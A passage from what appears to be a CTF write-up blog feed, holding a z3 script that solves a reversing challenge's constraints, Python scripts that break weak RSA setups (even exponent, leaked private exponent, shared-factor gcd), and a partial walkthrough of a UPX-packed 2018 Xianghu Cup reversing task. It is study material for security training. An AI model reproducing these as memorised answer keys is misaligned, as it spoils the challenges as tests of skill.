class="number">27</span>]</span><br><span class="line"> + <span class="number">25</span> * a1[<span class="number">28</span>]</span><br><span class="line"> + <span class="number">85</span> * a1[<span class="number">29</span>] == <span class="number">37450</span> ) </span><br><span class="line">s.add( <span class="number">14</span> * a1[<span class="number">28</span>]</span><br><span class="line"> + <span class="number">86</span> * a1[<span class="number">26</span>]</span><br><span class="line"> + <span class="number">93</span> * a1[<span class="number">25</span>]</span><br><span class="line"> + <span class="number">42</span> * a1[<span class="number">24</span>]</span><br><span class="line"> + <span class="number">94</span> * a1[<span class="number">21</span>]</span><br><span class="line"> + <span class="number">70</span> * a1[<span class="number">20</span>]</span><br><span class="line"> + <span class="number">58</span> * a1[<span class="number">22</span>]</span><br><span class="line"> + <span class="number">40</span> * a1[<span class="number">23</span>]</span><br><span class="line"> + <span class="number">76</span> * a1[<span class="number">27</span>]</span><br><span class="line"> + <span class="number">11</span> * a1[<span class="number">29</span>] == <span class="number">48740</span> ) </span><br><span class="line">s.add( <span class="number">72</span> * a1[<span class="number">28</span>]</span><br><span class="line"> + <span class="number">46</span> * a1[<span class="number">26</span>]</span><br><span class="line"> + <span class="number">92</span> * a1[<span class="number">25</span>]</span><br><span class="line"> + <span class="number">98</span> * a1[<span class="number">24</span>]</span><br><span class="line"> + <span class="number">55</span> * a1[<span class="number">23</span>]</span><br><span class="line"> + <span class="number">80</span> * a1[<span class="number">20</span>]</span><br><span class="line"> + <span class="number">32</span> * a1[<span 
class="number">21</span>]</span><br><span class="line"> + <span class="number">12</span> * a1[<span class="number">22</span>]</span><br><span class="line"> + <span class="number">84</span> * a1[<span class="number">27</span>]</span><br><span class="line"> + <span class="number">27</span> * a1[<span class="number">29</span>] == <span class="number">53599</span> ) </span><br><span class="line">s.add( <span class="number">53</span> * a1[<span class="number">27</span>]</span><br><span class="line"> + <span class="number">49</span> * a1[<span class="number">23</span>]</span><br><span class="line"> + <span class="number">99</span> * a1[<span class="number">22</span>]</span><br><span class="line"> + <span class="number">41</span> * a1[<span class="number">20</span>]</span><br><span class="line"> + <span class="number">20</span> * a1[<span class="number">21</span>]</span><br><span class="line"> + <span class="number">87</span> * a1[<span class="number">25</span>]</span><br><span class="line"> + <span class="number">81</span> * a1[<span class="number">26</span>]</span><br><span class="line"> + <span class="number">71</span> * a1[<span class="number">28</span>]</span><br><span class="line"> + <span class="number">73</span> * a1[<span class="number">29</span>] == <span class="number">52140</span> ) </span><br><span class="line">s.add ( <span class="number">68</span> * a1[<span class="number">28</span>]</span><br><span class="line"> + <span class="number">61</span> * a1[<span class="number">21</span>]</span><br><span class="line"> + <span class="number">28</span> * a1[<span class="number">20</span>]</span><br><span class="line"> + <span class="number">91</span> * a1[<span class="number">22</span>]</span><br><span class="line"> + <span class="number">31</span> * a1[<span class="number">23</span>]</span><br><span class="line"> + <span class="number">67</span> * a1[<span class="number">24</span>]</span><br><span class="line"> + <span class="number">15</span> * a1[<span 
class="number">25</span>]</span><br><span class="line"> + <span class="number">44</span> * a1[<span class="number">26</span>]</span><br><span class="line"> + <span class="number">6</span> * a1[<span class="number">27</span>]</span><br><span class="line"> + (a1[<span class="number">29</span>] << <span class="number">6</span>) == <span class="number">44449</span> )</span><br><span class="line">s.add( <span class="number">9</span> * a1[<span class="number">27</span>]</span><br><span class="line"> + <span class="number">60</span> * a1[<span class="number">25</span>]</span><br><span class="line"> + <span class="number">96</span> * a1[<span class="number">23</span>]</span><br><span class="line"> + <span class="number">17</span> * a1[<span class="number">20</span>]</span><br><span class="line"> + <span class="number">10</span> * a1[<span class="number">21</span>]</span><br><span class="line"> + <span class="number">29</span> * a1[<span class="number">22</span>]</span><br><span class="line"> + <span class="number">5</span> * a1[<span class="number">24</span>]</span><br><span class="line"> + <span class="number">100</span> * a1[<span class="number">26</span>]</span><br><span class="line"> + <span class="number">21</span> * a1[<span class="number">28</span>]</span><br><span class="line"> + <span class="number">69</span> * a1[<span class="number">29</span>] == <span class="number">35276</span> )</span><br><span class="line">s.add( <span class="number">59</span> * a1[<span class="number">26</span>]</span><br><span class="line"> + <span class="number">66</span> * a1[<span class="number">25</span>]</span><br><span class="line"> + <span class="number">23</span> * a1[<span class="number">22</span>]</span><br><span class="line"> + <span class="number">8</span> * (a1[<span class="number">20</span>] + <span class="number">3</span> * a1[<span class="number">21</span>])</span><br><span class="line"> + <span class="number">16</span> * a1[<span class="number">23</span>]</span><br><span 
class="line"> + <span class="number">56</span> * a1[<span class="number">24</span>]</span><br><span class="line"> + <span class="number">90</span> * a1[<span class="number">27</span>]</span><br><span class="line"> + <span class="number">36</span> * a1[<span class="number">28</span>]</span><br><span class="line"> + <span class="number">39</span> * a1[<span class="number">29</span>] == <span class="number">35577</span> ) </span><br><span class="line">s.add( <span class="number">35</span> * a1[<span class="number">25</span>]</span><br><span class="line"> + <span class="number">65</span> * a1[<span class="number">23</span>]</span><br><span class="line"> + <span class="number">63</span> * a1[<span class="number">22</span>]</span><br><span class="line"> + <span class="number">75</span> * a1[<span class="number">20</span>]</span><br><span class="line"> + <span class="number">88</span> * a1[<span class="number">21</span>]</span><br><span class="line"> + <span class="number">33</span> * a1[<span class="number">24</span>]</span><br><span class="line"> + <span class="number">82</span> * a1[<span class="number">26</span>]</span><br><span class="line"> + <span class="number">18</span> * a1[<span class="number">27</span>]</span><br><span class="line"> + a1[<span class="number">28</span>]</span><br><span class="line"> + <span class="number">37</span> * a1[<span class="number">29</span>] == <span class="number">42004</span> )</span><br><span class="line">s.add( <span class="number">54</span> * a1[<span class="number">28</span>]</span><br><span class="line"> + <span class="number">57</span> * a1[<span class="number">27</span>]</span><br><span class="line"> + <span class="number">43</span> * a1[<span class="number">24</span>]</span><br><span class="line"> + <span class="number">74</span> * a1[<span class="number">21</span>]</span><br><span class="line"> + <span class="number">19</span> * a1[<span class="number">20</span>]</span><br><span class="line"> + <span 
class="number">51</span> * a1[<span class="number">22</span>]</span><br><span class="line"> + <span class="number">13</span> * a1[<span class="number">23</span>]</span><br><span class="line"> + <span class="number">79</span> * a1[<span class="number">25</span>]</span><br><span class="line"> + <span class="number">3</span> * a1[<span class="number">26</span>]</span><br><span class="line"> + <span class="number">26</span> * a1[<span class="number">29</span>] == <span class="number">35802</span> )</span><br><span class="line">s.add( <span class="number">34</span> * a1[<span class="number">28</span>]</span><br><span class="line"> + <span class="number">50</span> * a1[<span class="number">27</span>]</span><br><span class="line"> + <span class="number">78</span> * a1[<span class="number">26</span>]</span><br><span class="line"> + <span class="number">52</span> * a1[<span class="number">25</span>]</span><br><span class="line"> + <span class="number">77</span> * a1[<span class="number">24</span>]</span><br><span class="line"> + <span class="number">95</span> * a1[<span class="number">23</span>]</span><br><span class="line"> + <span class="number">30</span> * a1[<span class="number">22</span>]</span><br><span class="line"> + <span class="number">89</span> * a1[<span class="number">20</span>]</span><br><span class="line"> + <span class="number">2</span> * a1[<span class="number">21</span>]</span><br><span class="line"> + <span class="number">97</span> * a1[<span class="number">29</span>] == <span class="number">54527</span> )</span><br><span class="line">s.add( <span class="number">46</span> * a1[<span class="number">36</span>] + <span class="number">73</span> * a1[<span class="number">34</span>] + <span class="number">15</span> * a1[<span class="number">30</span>] + <span class="number">16</span> * a1[<span class="number">31</span>] + <span class="number">41</span> * a1[<span class="number">32</span>] + <span class="number">94</span> * a1[<span class="number">33</span>] + 
<span class="number">28</span> * a1[<span class="number">35</span>] + <span class="number">45</span> * a1[<span class="number">37</span>] == <span class="number">34469</span> )</span><br><span class="line"></span><br><span class="line">s.add( <span class="number">82</span> * a1[<span class="number">36</span>] + <span class="number">10</span> * a1[<span class="number">32</span>] + <span class="number">48</span> * a1[<span class="number">31</span>] + <span class="number">65</span> * a1[<span class="number">30</span>] + <span class="number">6</span> * a1[<span class="number">33</span>] + <span class="number">30</span> * a1[<span class="number">34</span>] + <span class="number">27</span> * a1[<span class="number">35</span>] + <span class="number">32</span> * a1[<span class="number">37</span>] == <span class="number">31558</span> )</span><br><span class="line"> </span><br><span class="line">s.add( <span class="number">62</span> * a1[<span class="number">36</span>] + <span class="number">39</span> * a1[<span class="number">35</span>] + <span class="number">36</span> * a1[<span class="number">33</span>] + <span class="number">97</span> * a1[<span class="number">31</span>] + <span class="number">52</span> * a1[<span class="number">30</span>] + <span class="number">70</span> * a1[<span class="number">32</span>] + <span class="number">13</span> * a1[<span class="number">34</span>] + <span class="number">66</span> * a1[<span class="number">37</span>] == <span class="number">41820</span> )</span><br><span class="line"> </span><br><span class="line">s.add( <span class="number">44</span> * a1[<span class="number">34</span>] + <span class="number">42</span> * a1[<span class="number">33</span>] + <span class="number">78</span> * a1[<span class="number">32</span>] + <span class="number">83</span> * a1[<span class="number">31</span>] + <span class="number">96</span> * a1[<span class="number">30</span>] + <span class="number">4</span> * a1[<span class="number">35</span>] + <span 
class="number">9</span> * a1[<span class="number">36</span>] + <span class="number">51</span> * a1[<span class="number">37</span>] == <span class="number">38668</span> )</span><br><span class="line"> </span><br><span class="line">s.add( <span class="number">79</span> * a1[<span class="number">36</span>] + <span class="number">37</span> * a1[<span class="number">33</span>] + <span class="number">92</span> * a1[<span class="number">30</span>] + <span class="number">18</span> * a1[<span class="number">31</span>] + <span class="number">86</span> * a1[<span class="number">32</span>] + <span class="number">7</span> * a1[<span class="number">34</span>] + <span class="number">95</span> * a1[<span class="number">37</span>] == <span class="number">45530</span> )</span><br><span class="line"></span><br><span class="line">s.add( <span class="number">71</span> * a1[<span class="number">36</span>] + <span class="number">43</span> * a1[<span class="number">35</span>] + <span class="number">57</span> * a1[<span class="number">34</span>] + <span class="number">49</span> * a1[<span class="number">33</span>] + <span class="number">88</span> * a1[<span class="number">32</span>] + <span class="number">61</span> * a1[<span class="number">30</span>] + <span class="number">24</span> * a1[<span class="number">31</span>] + <span class="number">91</span> * a1[<span class="number">37</span>] == <span class="number">51396</span> )</span><br><span class="line"> </span><br><span class="line">s.add( <span class="number">34</span> * a1[<span class="number">36</span>] + <span class="number">75</span> * a1[<span class="number">35</span>] + <span class="number">35</span> * a1[<span class="number">32</span>] + <span class="number">23</span> * a1[<span class="number">30</span>] + <span class="number">3</span> * a1[<span class="number">31</span>] + <span class="number">53</span> * a1[<span class="number">33</span>] + <span class="number">14</span> * a1[<span class="number">34</span>] + <span 
class="number">47</span> * a1[<span class="number">37</span>] == <span class="number">28874</span> )</span><br><span class="line"> </span><br><span class="line">s.add( <span class="number">22</span> * a1[<span class="number">36</span>] + <span class="number">84</span> * a1[<span class="number">35</span>] + <span class="number">26</span> * a1[<span class="number">34</span>] + <span class="number">90</span> * a1[<span class="number">33</span>] + <span class="number">99</span> * a1[<span class="number">30</span>] + <span class="number">98</span> * a1[<span class="number">31</span>] + <span class="number">25</span> * a1[<span class="number">32</span>] + a1[<span class="number">37</span>]==<span class="number">38231</span> )</span><br><span class="line"></span><br><span class="line"><span class="comment"># 38 unknowns a1[0..37], one flag byte each; the solver above is named s</span></span><br><span class="line"><span class="keyword">assert</span> s.check() == sat</span><br><span class="line">result = s.model()</span><br><span class="line"> </span><br><span class="line">flag = <span class="string">''</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">0</span>,<span class="number">38</span>):</span><br><span class="line"> flag += chr(result[a1[i]].as_long())</span><br><span class="line"><span class="keyword">print</span> (flag)</span><br></pre></td></tr></table></figure></div><figure class="image-bubble"><img src="https://i.loli.net/2020/12/27/aEDdyTbFmQ46Wxw.png" alt="" title=""></figure><figure class="image-bubble"><img src="https://i.loli.net/2020/12/27/Q9CsiBqEcPeFYgJ.png" alt="" title=""></figure><h3 id="名字没想好"><a href="#名字没想好" class="headerlink" title="名字没想好"></a>Name not decided yet</h3><p>First part</p><div class="highlight-wrap" autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" 
contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">from</span> Crypto.Util.number <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">import</span> gmpy2</span><br><span class="line"></span><br><span class="line">e = <span class="number">103738</span></span><br><span class="line"><span class="comment"># e = 2*27361</span></span><br><span class="line">n = <span class="number">24511956296934419790810802924028121267308277322350201914243748724443965915830044792139346496470216715543376102606906727287935669186132061565360428924230740995935556111187855700300365517739695893842582114724005232045077425187550801509268664723237890122110051088839310003135672964413501812829310021228720112275276180469100308793523051405119335989674132224715582989624204590983857159312466387546505666052162775188773736419909262619409755848412558718676873188073997893894862353873441073313610102773845304906678909624700529896455885309546409645526387707907518497436045821973310653257012148438207441605902771515486273283273</span></span><br><span class="line">gift = <span class="number">12255978148467209895405401462014060633654138661175100957121874362221982957915022396069673248235108357771688051303453363643967834593066030782680214462115370497967778055593927850150182758869847946921291057362002616022538712593775400754634332361618945061055025544419655001567836482206750906414655010614360056137481173664901476116870144816992211793902146834987166288769615612767704010592138813256140678199511291489394523989294805910740127557682458229594376211232977501267410539674224065875285801753027816046254818608535462445306054117075379711073762930279723764342988824053970592468109679774789092077979655857748513636834</span></span><br><span class="line">c = <span 
class="number">7357116532209949285136310518084676100522798730487701269950303460540634127932201594120600757671807456790592531487713433579926404640474277692592102315472760853853767347752080563508622523821339163225554653816787201616233932746815764392729597579461985789538131853246938443458331139199802764554726447278501492140335824365867574318693890007499638038064582031311613039571335453968072426153706431456149868515230310567240569544961967582304893471240728585336273245259533905230737876248875784828430507371662455796543123714325161987112223947057481814610592300979207673818538093532100233028106442070524965861451563388404227738574</span></span><br><span class="line"><span class="comment"># gift = 8 * 11 * 97 * 9601 * 26057167557433418766727399341516665922795024485718296827775927226598694152064298989740080209950805089159979564300359652085874056289167084685303669920341402021998569251561854184586912056788515477034039863935829715784489123437315798902409373317578932823488000322365526936227790036245092665207472438169954702748857842187299166976320465787901470261800372425345547560303561842376571751928531743505412746346436473024093575122041981043859827477404447458211341273671273506575488189374812217939984540494633634622813448773520886788206836310702581026986331011987344147901504555559723572981774237352245997308787165273589</span></span><br><span class="line"></span><br><span class="line">print(len(bin(gift)[<span class="number">2</span>:]))</span><br><span class="line">print(len(bin(n)[<span class="number">2</span>:]))</span><br><span class="line"></span><br><span class="line"><span class="comment"># gift * gcd = (p-1) * (q-1)</span></span><br><span class="line"><span class="comment"># gift % gcd = 0</span></span><br><span class="line"><span class="keyword">for</span> gcd_val <span class="keyword">in</span> range(<span class="number">4</span>, <span class="number">8</span>):</span><br><span class="line"> phi = gift * gcd_val</span><br><span class="line"> <span 
class="keyword">try</span>:</span><br><span class="line">    d = gmpy2.invert(e // <span class="number">2</span>, phi)</span><br><span class="line">    m_2 = pow(c, int(d), n)</span><br><span class="line">    flag = long_to_bytes(gmpy2.isqrt(m_2))</span><br><span class="line">    print(flag)</span><br><span class="line"> <span class="keyword">except</span> ZeroDivisionError:</span><br><span class="line">    <span class="comment"># no inverse exists: e//2 is not coprime to this candidate phi</span></span><br><span class="line">    <span class="keyword">continue</span></span><br></pre></td></tr></table></figure></div><p>Second part</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">import</span> gmpy2</span><br><span class="line"><span class="keyword">import</span> Crypto.Util.number</span><br><span class="line"><span class="keyword">import</span> sympy</span><br><span class="line">d = <span class="number">14519297697723031496224953772301033569165883208616356699837703756220717249229195213146695656923357394378868735444167631602696573904678412172248043414276910206086892084385988564720914312238316434518024995169814463252129242492227202678878240875905293369168263909256455159691392124769949072754243536472227070447391890140409479709945084894060833468804156778720190688101601664725009609222256314873780002770605127043596912060811904733471592387441742111474341938658516761896926403628885365926903655309306738689809023277824030268579979837642613499180913999651379232105756338399243024739524553588216117189742912479604441636257</span></span><br><span class="line"><span class="comment">#d = 
14519297697723031496224953772301033569165883208616356699837703756220717249229195213146695656923357394378868735444167631602696573904678412172248043414276910206086892084385988564720914312238316434518024995169814463252129242492227202678878240875905293369168263909256455159691392124769949072754243536472227070447391890140409479709945084894060833468804156778720190688101601664725009609222256314873780002770605127043596912060811904733471592387441742111474341938658516761896926403628885365926903655309306738689809023277824030268579979837642613499180913999651379232105756338399243024739524553588216117189742912479604441636257</span></span><br><span class="line"><span class="comment">#c = 23574157314515030841894399693996910252287747536395985840285410194536546768646580704111053676040921830550019965767796038280932469005359270920519250763405535872475345625907947986452218739530197421244240070129909526493952916306821311836861766221812155261751444946282559677005557815746813525162411907545113665605490915464367483833005576787591204417525937745572210195816236947103271664048065491627347939268785403334419989160034526164012966888952162714736497312282011026789187871221751240709801544484784941178786820290118585681595783245449236394480319395321877182096839866054466492123200354772280398476167002177544154960579</span></span><br><span class="line">c = <span 
class="number">23574157314515030841894399693996910252287747536395985840285410194536546768646580704111053676040921830550019965767796038280932469005359270920519250763405535872475345625907947986452218739530197421244240070129909526493952916306821311836861766221812155261751444946282559677005557815746813525162411907545113665605490915464367483833005576787591204417525937745572210195816236947103271664048065491627347939268785403334419989160034526164012966888952162714736497312282011026789187871221751240709801544484784941178786820290118585681595783245449236394480319395321877182096839866054466492123200354772280398476167002177544154960579</span></span><br><span class="line">e = <span class="number">0x10001</span></span><br><span class="line"><span class="comment"># We know c, d and e. Since e*d = 1 mod (p-1)(q-1), we have e*d-1 = k*(p-1)*(q-1)</span></span><br><span class="line"><span class="comment"># so k can be brute-forced to recover (p-1)(q-1)</span></span><br><span class="line"><span class="comment"># Bounding k: e*d - 1 is 2063 to 2064 bits and (p-1)(q-1) is 1024+1024 bits, so k lies in 2**15 ~ 2**16</span></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> range(<span class="number">1000</span>,<span class="number">3000</span>):</span><br><span class="line">    <span class="keyword">if</span> e*d<span class="number">-1</span> > <span class="number">2</span>**i <span class="keyword">and</span> e*d<span class="number">-1</span><<span class="number">2</span>**(i+<span class="number">1</span>):</span><br><span class="line">        print(i)</span><br><span class="line">        <span class="keyword">break</span></span><br><span class="line">    <span class="comment">#2063</span></span><br><span class="line"><span class="comment"># (e*d-1) mod k must be 0</span></span><br><span class="line"><span class="comment"># We also know q is the next prime after p, so the two are close in size</span></span><br><span class="line"><span class="keyword">for</span> k <span class="keyword">in</span> range(<span class="number">2</span>**<span class="number">14</span>,<span class="number">2</span>**<span class="number">16</span>):</span><br><span class="line">    <span class="keyword">if</span> (e*d<span class="number">-1</span>) % k==<span class="number">0</span>:</span><br><span class="line">        p = sympy.prevprime(gmpy2.iroot((e*d<span class="number">-1</span>)//k,<span class="number">2</span>)[<span class="number">0</span>])</span><br><span class="line">        <span class="comment"># sympy.prevprime(n) gives the largest prime below n</span></span><br><span class="line">        <span class="comment"># gmpy2.iroot returns a tuple (root, is_exact), so take index 0</span></span><br><span class="line">        q = gmpy2.next_prime(p)</span><br><span class="line">        <span class="comment"># print(q)</span></span><br><span class="line">        <span class="comment"># print(p)</span></span><br><span class="line">        <span class="keyword">if</span> (e*d<span class="number">-1</span>)//k == (q<span class="number">-1</span>)*(p<span class="number">-1</span>):</span><br><span class="line">            <span class="comment"># verify that p and q are correct</span></span><br><span class="line">            <span class="keyword">break</span></span><br><span class="line">n = q * p</span><br><span class="line">print(n)</span><br><span class="line">m = pow(c ,d ,n )</span><br><span class="line"><span class="comment">#print(byte1s.fromhex(hex(m)[2:]))</span></span><br><span class="line"><span class="keyword">import</span> binascii</span><br><span class="line">print(binascii.unhexlify(hex(m)[<span class="number">2</span>:]))</span><br><span class="line"><span class="comment">#print(Crypto.Util.number.long_to_bytes(m))</span></span><br></pre></td></tr></table></figure></div><h3 id="Merry-Christmas"><a href="#Merry-Christmas" class="headerlink" title="Merry_Christmas"></a>Merry_Christmas</h3><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="PYTHON"><figure class="iseeu highlight /python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">import</span> gmpy2</span><br><span class="line"><span class="keyword">from</span> 
gmpy2 <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> Crypto.Util.number <span class="keyword">import</span> *</span><br><span class="line">n=<span class="number">17539423546879883396629573776616418986256902147283732214295946312835113344061142956076117932720247053739715326040027048199629442201144987405090572982720131052885163184811793669071684926986445262835990861167700118224153436202178098707759605979066475651999711718728200184335695206586643579499656822346329750835696158561669170301767928780361376643304324731146650458384564533895090608529488304659924485356518526226061081943815971670656857778229528022465452008890430046982169571771039198877713729197033434033303723925335811353531172899520232033290866272195248554656110282928669639257994965701208856346298076998993772423097</span></span><br><span class="line">c=<span class="number">5560694632613114538708358450844738346732427106497566176686415566542021811907746171660858360055720615188679328728275250111979427060322426593068123630729075838980217642604281020733578019517061369665467249555496690538379316251258553434263030485822069081031041121329559075841297923650799241347196473466430248261213536319894271629049899379974582453405472218720572088937075254938460083046946717784821298765199164644879680847984441166684509290675197526982405556980540919856072198191306527746754844792294221564010770506298266272017613487725494001276623402987809305696759434595799863487759478902384039066714073292949058853003</span></span><br><span class="line">n1=<span 
class="number">21465819616864492551767155722996412718832402997933699784091937387760830726039866762857450959675228856561597024318920734312362144261628290737563681759442171285581931041622345778933572673367607809994811354957971820829401430301563611970709279094237597394734599103937206689348004861322161582747568764567491894069565665829828570957338594421227530701263883322496237907509301547209937444268813162260988374157151529111924866290775985684107622034449136081744171954609262107449388993051611516007232903948144186151363436032658716266030263647775582015141329829060294352706551807295555026827381280240539020513044515406829846588787</span></span><br><span class="line">c1=<span class="number">19585478304129650368934167685581947379018238627360258251578178648406399091655911309790559870365866290321783969820131014958701556570645863667895395615377725655139970869868226237575462206775170966585306390686724869174973947234608655786245191308423334769172394586099003865664934720651493266130413617892286830586179842568659758155132923079476873190047514962385696606866440573294836559927597496331643346032100075257329902065785369011323134807157288931237650262052445952481912276967263237183320639027956890814569212814115581834172475173790422964999583755677956698930811772293980516268488171908878145019531149798750799613142</span></span><br><span class="line">gift1=<span 
class="number">21073862899796816496314528055339279280335681203948249072101881208021752125789533267427994742277358208178070970462447090818216561770563907183494712376741842209323406667050344266668347773728401520981152006053958337605219297650281680615939792818684114311810254344598007357629176456353064311734075462353266893546853648829947081541158912147691654438830914577857503519080776224006347318623082457516638594584206488534978134212723395494600005197454325625290580653432901204502054226866606652982669196910942405139803194404497913820850500332680877820694279428529873469583387698995104411071804749202120283361058269192420218572231</span></span><br><span class="line">gift2=<span class="number">7634352822409241151514235360777296908269419654786551951076299092182838191720014827302929726661609788893676185300000003824161794580145215813570705896440007085639728197111313542046542236060921056046727832889041640187683808320443684484085665265794806366182119574554965179974119587542057100849953753232435527244682735108194058759240757296546820383552711669453408694460188770050594702462736564767783116432265746800810795602828775783509056534518928775187835786128676790426643882842096826044057116388930041087679950264956074503205229333151001519229166174531496272703271636344792947552939606533888390978361247276796123693665</span></span><br><span class="line"></span><br><span class="line">t1=pow(gift1,<span class="number">691</span>,n1)</span><br><span class="line">t2=pow(gift2,<span class="number">587</span>,n1)</span><br><span class="line">x1=t1-t2</span><br><span class="line">x2=t2-t1</span><br><span class="line">xx = gmpy2.gcd(x2,n1)</span><br><span class="line">p1=xx</span><br><span class="line"><span class="comment">#p1 = 
111260936618891036068652208614496645952776413871721160526197362367054114767347494528257565447229196035984168278796498545668532710414950556409048002275825950676900234517459096095264009412617416429176073580216701699837149712564123810225413587649986801062654943062839747848949602864178056960224292368694023834399</span></span><br><span class="line">e1 = <span class="number">979691</span></span><br><span class="line">q1 = n1//p1</span><br><span class="line">p1 = mpz(p1)</span><br><span class="line">q1 = mpz(q1)</span><br><span class="line">e1 = mpz(e1)</span><br><span class="line">phi1 = (q1<span class="number">-1</span>) * (p1<span class="number">-1</span>) </span><br><span class="line">d1 = gmpy2.invert(e1, phi1)</span><br><span class="line">p = pow(c1,d1,n1)</span><br><span class="line">print(p)</span><br><span class="line"></span><br><span class="line">q = n//p</span><br><span class="line"><span class="comment">#print(isPrime(p))</span></span><br><span class="line"><span class="comment">#print(isPrime(q))</span></span><br><span class="line">e = <span class="number">65537</span></span><br><span class="line">p = mpz(p)</span><br><span class="line">q = mpz(q)</span><br><span class="line">e = mpz(e)</span><br><span class="line">phi = (p - <span class="number">1</span>) * (q - <span class="number">1</span>)</span><br><span class="line">d = gmpy2.invert(e, phi)</span><br><span class="line">m = pow(c,d,n)</span><br><span class="line"></span><br><span class="line">print(long_to_bytes(m))</span><br></pre></td></tr></table></figure></div>]]></content>
<summary type="html">
<h2 id="岁末赛"><a href="#岁末赛" class="headerlink" title="岁末赛"></a>岁末赛</h2>
</summary>
<category term="CTF" scheme="https://github.com/gha01un/gha01un.github.io/categories/CTF/"/>
<category term="RE" scheme="https://github.com/gha01un/gha01un.github.io/tags/RE/"/>
</entry>
<entry>
<title>Replace</title>
<link href="https://github.com/gha01un/gha01un.github.io/2020/12/18/Replace/"/>
<id>https://github.com/gha01un/gha01un.github.io/2020/12/18/Replace/</id>
<published>2020-12-18T10:04:36.674Z</published>
<updated>2021-01-11T01:42:35.049Z</updated>
<content type="html"><![CDATA[<h3 id="2018湘湖杯逆向题"><a href="#2018湘湖杯逆向题" class="headerlink" title="2018湘湖杯逆向题"></a>2018 Xianghu Cup reverse engineering challenge</h3><a id="more"></a><p>First, inspect the file.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/18/RZiQLXduOGplEB3.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>It is a UPX-packed 32-bit binary, so I moved it into Kali and unpacked it manually.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/18/opgYmX1bihZWRqB.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>Load the unpacked file into IDA and decompile it.</p><figure class="image-bubble"> <div class="img-lightbox"> <div class="overlay"></div> <img src="https://i.loli.net/2020/12/18/98FJxWmIcuthzaZ.png" alt="" title=""> </div> <div class="image-caption"></div> </figure><p>One key point: the input buf must be exactly 35 characters long.<br>Let's look inside sub_401090.</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="C"><figure class="iseeu highlight /c"><table><tr><td class="code"><pre><span class="line"><span class="function"><span class="keyword">signed</span> <span class="keyword">int</span> __fastcall <span class="title">sub_401090</span><span class="params">(<span class="keyword">int</span> a1, <span class="keyword">int</span> a2)</span></span></span><br><span class="line"><span class="function"></span>{</span><br><span class="line"> <span class="keyword">int</span> v2; <span class="comment">// ebx</span></span><br><span class="line"> <span class="keyword">int</span> v4; <span class="comment">// edx</span></span><br><span class="line"> <span class="keyword">char</span> v5; <span class="comment">// al</span></span><br><span class="line"> <span class="keyword">int</span> v6; <span class="comment">// esi</span></span><br><span class="line"> <span class="keyword">int</span> v7; <span class="comment">// edi</span></span><br><span class="line"> <span 
class="keyword">char</span> v8; <span class="comment">// al</span></span><br><span class="line"> <span class="keyword">int</span> v9; <span class="comment">// eax</span></span><br><span class="line"> <span class="keyword">char</span> v10; <span class="comment">// cl</span></span><br><span class="line"> <span class="keyword">int</span> v11; <span class="comment">// eax</span></span><br><span class="line"> <span class="keyword">int</span> v12; <span class="comment">// ecx</span></span><br><span class="line"></span><br><span class="line"> v2 = a1;</span><br><span class="line"> <span class="keyword">if</span> ( a2 != <span class="number">35</span> )</span><br><span class="line"> <span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line"> v4 = <span class="number">0</span>;</span><br><span class="line"> <span class="keyword">while</span> ( <span class="number">1</span> )</span><br><span class="line"> {</span><br><span class="line"> v5 = *(_BYTE *)(v4 + v2);</span><br><span class="line"> v6 = (v5 >> <span class="number">4</span>) % <span class="number">16</span>;</span><br><span class="line"> v7 = (<span class="number">16</span> * v5 >> <span class="number">4</span>) % <span class="number">16</span>;</span><br><span class="line"> v8 = byte_402150[<span class="number">2</span> * v4];</span><br><span class="line"> <span class="keyword">if</span> ( v8 < <span class="number">48</span> || v8 > <span class="number">57</span> )</span><br><span class="line"> v9 = v8 - <span class="number">87</span>;</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> v9 = v8 - <span class="number">48</span>;</span><br><span class="line"> v10 = byte_402151[<span class="number">2</span> * v4];</span><br><span class="line"> v11 = <span class="number">16</span> * v9;</span><br><span class="line"> <span class="keyword">if</span> ( v10 < <span class="number">48</span> || v10 > <span class="number">57</span> 
)</span><br><span class="line"> v12 = v10 - <span class="number">87</span>;</span><br><span class="line"> <span class="keyword">else</span></span><br><span class="line"> v12 = v10 - <span class="number">48</span>;</span><br><span class="line"> <span class="keyword">if</span> ( (<span class="keyword">unsigned</span> __int8)byte_4021A0[<span class="number">16</span> * v6 + v7] != ((v11 + v12) ^ <span class="number">0x19</span>) )</span><br><span class="line"> <span class="keyword">break</span>;</span><br><span class="line"> <span class="keyword">if</span> ( ++v4 >= <span class="number">35</span> )</span><br><span class="line"> <span class="keyword">return</span> <span class="number">1</span>;</span><br><span class="line"> }</span><br><span class="line"> <span class="keyword">return</span> <span class="number">-1</span>;</span><br><span class="line">}</span><br></pre></td></tr></table></figure></div><p>We need this function to return 1, which means the loop has to reach</p><div class="highlight-wrap"autocomplete="off" autocorrect="off" autocapitalize="off" spellcheck="false" contenteditable="true"data-rel="C"><figure class="iseeu highlight /c"><table><tr><td class="code"><pre><span class="line"><span class="keyword">if</span> ( ++v4 >= <span class="number">35</span> )</span><br><span class="line"><span class="keyword">return</span> <span class="number">1</span>;</span><br></pre></td></tr></table></figure></div><p>Now look at the function's logic from the top: <code>v5 = *(_BYTE *)(v4 + v2);</code></p><p>v2 is assigned from a1, and a1 is the buf we entered.</p><p>v4 starts at 0 and is incremented by 1 on every iteration, so v5 is the v4-th byte of our input.<br>Next, <code>v6 = (v5 >> 4) % 